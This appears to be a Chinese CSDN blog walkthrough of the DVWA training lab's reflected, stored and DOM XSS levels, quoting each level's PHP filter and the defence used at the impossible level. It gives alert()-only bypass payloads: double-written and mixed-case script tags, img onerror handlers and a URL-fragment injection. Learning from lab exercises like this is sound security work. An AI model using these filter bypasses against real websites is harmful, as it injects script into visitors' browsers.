DVWA XSS漏洞

最新推荐文章于 2024-05-25 11:17:27 发布
最新推荐文章于 2024-05-25 11:17:27 发布
阅读量526 收藏 4
点赞数 1
分类专栏: 信息安全漏洞 DVWA 文章标签: xss 安全漏洞 html CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49422880/article/details/120050992
版权

一、Reflected XSS

1.1Low

没有任何的过滤,直接插入我们的注入语句。

<script>alert(/hello world/)</script>

1.2medium

审计一下源码发现有了一层简单的过滤处理。

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );//匹配到该字符串就用空格替换,我们需要双写绕过,或则使用大小写绕过

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

<s<script>cript>alert(/hello world/)</sc<script>ript>

<SCript>alert(/hello world/)</sCRipt>

 

1.3high

代码审计,发现关于script的标签无法使用,这个时候我们只能进行标签改变进行处理。

使用img标签进行注入。

payload:<img src=0 οnerrοr=alert("Hello")>

​
<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?>

​

1.4impossible

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

其中使用了htmlspecialchars函数 ,将我们所输入的字符全部转化成字符串实体,不能发挥出标签的作用,所以无法注入。

二、Store XSS

2.1Low

这个场景就是模拟网络留言板的Xss注入,这里有两个对话框,我们都将我们的注入语句插入其中寻找注入点,发现注入点在我们所提交的内容<script>alert("mohe xss")</script>上,毕竟是Low所以直接过。

2.2medium

         审计一下代码,发现也只是一个简单的匹配过滤而已,双写绕过即可。而且注入点是在name那里,所以我们需要使用BS抓包。(本地搭建的我不会用BS抓包,我用的是buu上的靶场)

<scr<script>ipt>alert("mohe xss")</scr<script>ipt> 

 注入成功!!!

2.3high

        感觉和之前的差不多就是过滤掉script,我们换别的标签显示即可。

<img src=0 οnerrοr=alert("mohe xss")>

 

2.4impossible

        和反射性Xss一样也是使用htmlspecialchars函数将我们输入地语句变为实体,也就是字符串,是我们的插入语句不能执行,变为字符串直接输出。

三、DOM XSS

3.1Low

没过滤,直接插入。

3.2medium

审计代码,告诉我们输入的参数中有<script,即失败,所以我们绕过即可,换个标签插入。 

</option></select><img src=1 οnerrοr=alert("xss")>,并且在输入的过程中要进行闭合处理。不然还是无法显示出我们注入的内容。

 

3.3high

这里high级别的代码先判断defalut值是否为空,如果不为空的话,再用switch语句进行匹配,如果匹配成功,则插入case字段的相应值,如果不匹配,则插入的是默认的值。此时,在URL中添加注释#注释的内容不会提交到服务器,而是在浏览器执行。所以我们进行尝试
default=English#<script>alert("xss")</script>

 

3.4impossible

Don't need to do anything, protction handled on the client side!!!

小蓝同学`
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过DVWA学习DOM型XSS
Mi1k7ea
01-02 4021
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...
DVWA-反射型XSS漏洞
Drink_J的博客
03-20 562
(一)将DVWA的级别设置为low 1.1 查看源代码,没有对参数做任何过滤,直接输出 1.2尝试一般的XSS攻击 ①输入 window.location用于获得当前页面的URL,并把浏览器重定向到新的页面 iframe作用是文档中的文档,将原页面变为一个长和宽为0的网页 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200320172629582.pn...
搭建dvwa环境
zty
09-21 1258
下载文件 环境:PHP/MySQL dvwa包含了OWASP Top10的所有攻击漏洞可供测试,提供了一整套的web渗透测试环境。靶场包含Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(Dom)(Dom型跨站脚
DVWA靶场XSS反射性和存储型的漏洞测试(low~high)
weixin_51585429的博客
11-07 2106
DVWA靶场XSS反射型、存储型漏洞模块low~high等级
DVWA打靶进阶】利用Python的http服务器以及xss漏洞修改受害者账户口令
crizemire的博客
05-25 631
受害者在访问页面的一瞬间,其cookie就泄露到了远程主机,密码也被远程更改。
DVWA靶机-存储型XSS漏洞(Stored)
weixin_43726831的博客
11-25 4635
DVWA靶机-存储型XSS漏洞(Stored) 前章: DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) DVWA靶机-存储型X...
DVWAXSS(跨站脚本漏洞)
TenG的博客
11-12 870
前言 本篇文章为DVWA平台XSS(跨站脚本漏洞)类型题目,本篇文章目的为记录自己的作题过程并且希望能够帮到大家,如有错误还请各位师傅指正! 本篇文章会同步至本人博客https://tenghy.gitee.io/teng/ 环境&工具: Windows10、phpstudy 正文 反射型XSS:反射型XSS又叫持久型XSS攻击,是攻击者发送一个带有恶意脚本的URL诱导他人点击,进一步触发脚本在浏览器上面运行。因为需要他人点击,所以链接都会具有诱惑性的名称。 存储型XSS:攻击者通过各种方式把恶意
DVWA XSS
部分学习记录
09-19 227
DOM Based Cross Site Scripting (XSS) low 打开是一个菜单选项,提交以后发现URL有参数,修改一下呢?成功了,那直接试一下xss脚本<script>alert(document.cookie);</script>,成功获取到cookie medium 构造代码<script>alert(document.cookie)</script>,没效果?应该是有过滤机制,试一下双写,还是不行,会不会是转义问题?直接利用URL编码
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA靶场搭建与使用
09-02
DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的模拟场景,包括SQL注入、跨站...
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
基于PythonFlaskWeb版网站sqlxss漏洞扫描框架 html + flask + python + mysql
最新发布
05-27
基于PythonFlaskWeb版网站sqlxss漏洞扫描 框架 html + flask + python + mysql + orm +dvwa+sqllabs+pikachu dvwa config\config.inc.php.bak to config.inc.php $_DVWA[ 'db_server' ] = getenv('DB_SERVER') ?:...
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4049
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
DVWA靶场存储型XSS漏洞实验
weixin_44851588的博客
05-26 4633
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储型XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSSXSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
DVWA系列Web常见漏洞XSS(DOM)源码分析及漏洞利用
weixin_57641619的博客
05-24 1717
本期主要讲解什么是基于DOM的XSS漏洞XSS(DOM)漏洞攻击实例,基于DOM的XSS漏洞产生的原因以及一般会在何处产生,最后讲解如何利用基于DOM的XSS漏洞(如XSS经典的窃取cookie等)。
DVWA靶场通关记录(存储型XSS漏洞)
weixin_73557450的博客
05-29 164
而这些操作都是对message栏目实施的,name栏只是简单的替换了标签,但name栏有输入长度限制。和存储型漏洞一样的是,这回我们仍然换标签,源代码中用正则表达式绕过了标签,我们可以换成或存储型XSS漏洞与反射型不同的是,存储型持续时间会很长,即便刷新页面或者关闭页面,再次打开时XSS漏洞依然会发挥作用。刷新页面或者退出页面时,我们注入的XSS攻击仍然有效,这就是存储型漏洞的特点。XSS存储型漏洞就到这里了,欢迎反馈和交流。
dvwaXSS(reflected)
ANDTM的博客
06-07 389
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。根据注入的恶意代码是否存储在服务器数据库中,XSS可以分为存储型的XSS与反射型的XSS,还有DOM型的XSS由于其特殊性,常常被分为第三种。SS利用的常见用途:盗取用户cookies、劫持会话、流量劫持、网页挂马、DDOS、提升权限…
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 2142
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
DVWA学习之XSS(跨站脚本攻击)
mmxhappy的专栏
02-04 947
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击!
dvwa xss restore
08-12
对于DVWA(Damn Vulnerable Web Application)中的XSS(跨站脚本攻击)漏洞的修复,您可以按照以下步骤进行操作: 1. 确保您已经安装了DVWA并启动了相应的服务器。 2. 登录到DVWA应用程序,并导航到XSS攻击页面。 3. 在XSS攻击页面中,输入一些恶意的脚本代码来触发XSS漏洞。 4. 检查并确认XSS漏洞已经成功触发。 5. 打开DVWA的源代码文件,并找到与XSS漏洞相关的代码段。 6. 修复XSS漏洞的方法通常是对用户输入进行适当的验证和过滤。您可以使用安全编码方法(如HTML编码或转义字符)来防止恶意脚本的执行。 7. 在修复代码后,保存并重新部署DVWA应用程序。 8. 再次登录到DVWA,并返回到XSS攻击页面。 9. 输入先前用于触发XSS漏洞的恶意脚本代码,以验证修复是否成功。 10. 如果成功修复,您将看到脚本不再执行,或者以安全的方式进行处理。 请注意,这是一个基本的修复过程,并且具体的步骤可能因DVWA的版本和配置而有所不同。在进行任何安全性修复之前,请确保您了解DVWAXSS漏洞的工作原理,并根据您的具体情况进行相应的操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值